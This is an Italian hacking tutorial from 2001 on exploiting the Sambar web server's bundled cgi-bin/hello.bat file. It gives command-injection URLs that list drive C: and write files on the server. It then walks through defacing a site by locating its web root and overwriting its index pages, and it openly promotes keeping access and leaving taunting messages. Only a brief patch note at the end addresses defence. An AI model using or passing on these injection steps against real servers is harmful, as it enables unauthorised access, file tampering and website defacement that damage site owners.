Agosto-2001

            
                            .:La Grande Guida AllHacking Di IIS:.            
                                                                                
                                       [realizzata da]                          
                       ___                                                      
                      /     __   __  |/  |__   __   __  |/   ___   __           
                      \___ (__) (__) |\ |__) (__) (__) |\ (__/_ |  '          
                                                                                
                                                                                
                                            ___                                 
                                           (__/_                                
                                                                                
                     _                                                          
                    |_  ___  |   _|_   __   __    __  __   __   __              
                    |  (__/_ |_,  |_, (__) |  ) __)  |__) |  ' (__( (__|        
                                                     |                _|        
            



2.1 Sambar


[Sistemi vulnerabili: Sambar Web/FTP Server]

[Exploit: Sambar]

[Vulnerabilit]

Il sambar  un server sia WEB che FTP che contiene unApi programmabile fino
ai minimi dettagli, con il suo linguaggio di scripting  possibile realizzare
pagine dinamiche html. Per maggiori informazioni: www.sambar.com .
Lerrore del sambar che noi sfruttiamo sta in un file BATCH che viene
installato nella directory /cgi-bin/. Il contenuto del file  riportato qui
sotto:

@echo off
echo Hello world

se noi andiamo a richiamare dal web il file 

www.microsoft.com/cgi-bin/hello.bat (ovviamente  un sito preso a caso :)

Se il server  exploitabile a questo bug verr riportata come pagina solo la
scritta "Hello World" se invece ci da come pagina la solita "impossibile
visualizzare la pagina web" mettete da parte lexploit del sambar e andate
avanti ;-)

Mettiamo caso che il server  vulnerabile, possiamo far passare attraverso il
sambar delle chiamate un po "strane" la pi semplice  visualizzare il
contenuto del drive C:

http://www.microsoft.com/cgi-bin/hello.bat?&dir+c:\



Quindi attraverso il sambar diciamo di compiere questa operazione e sul
nostro browser apparire il contenuto dell'unit C. Adesso possiamo immaginare
ci che possiamo eseguire, guardare i contenuti, modificare, cancellare ecc
basta solo che conosciate i comandi "dos".
Il nostro scopo potrebbe essere:

1)	Conserviamo laccesso al sistema
2)	Creiamo un file di testo e spieghiamo come siamo entrati
3)	Defacciamo il sito

Cominciamo ad optare per le scelte:

a)	Scelta non molto logica, non ci resta una shell ma solo laccesso a qualche dato di poco conto visto che i server afflitti da questo bug sono pochi.
b)	Scelta normale, infondo vogliamo diventare hacker quindi...
c)	Scelta che io preferisco accoppiare al file di testo, per me il defaced  la maniera pi bruta di far capire al SYS ADMIN che deve studiare...

Dopo tutto ci spiego sia come creare un file di testo che come defacciare,  quasi identico soltanto che per defacciare bisogna perderci pi tempo.

www.microsoft.com/cgi-bin/hello.bat?&echo+server+afflitto+dal+bug+sambar+consiglio+di+cancellare+il+file+hello.bat+e stai+al+sicuro+ZioBill:+fixa+la tua ignoranza+e+ricorda+che+Feltonspray+ti+ha+bucato+il+server>c:\dir\hacked.txt  

Oppure come volete voi basta che al posto degli spazi mettete "+" una volta dato invio verr creato un file del nome che avete dato contenente ci che avete scritto. Adesso credo che non sia difficile capire come si fa il defaced :-) per dovete trovare la giusta WEB ROOT in genere c:\InetPub\wwwroot ma molto spesso cambia, provate altri drive come D E F G H ecc la pagina iniziale potrebbe avere questi nomi:

index.htm
index.html
index.asp
default.htm
default.html
default.asp
home.htm


[Patch: basta eliminare il file hello.bat da /cgi-bin/]


                           _________________________________________
                          [                                         ]
                          [            Copyright (C) 2001           ]
                          [                                         ]
                          [ FeltonSpray  - feltonspray@katamail.com ]
                          [                                         ]
                          [   Cookbooker - cookbooker@libero.it     ]
                          [                                         ]
                           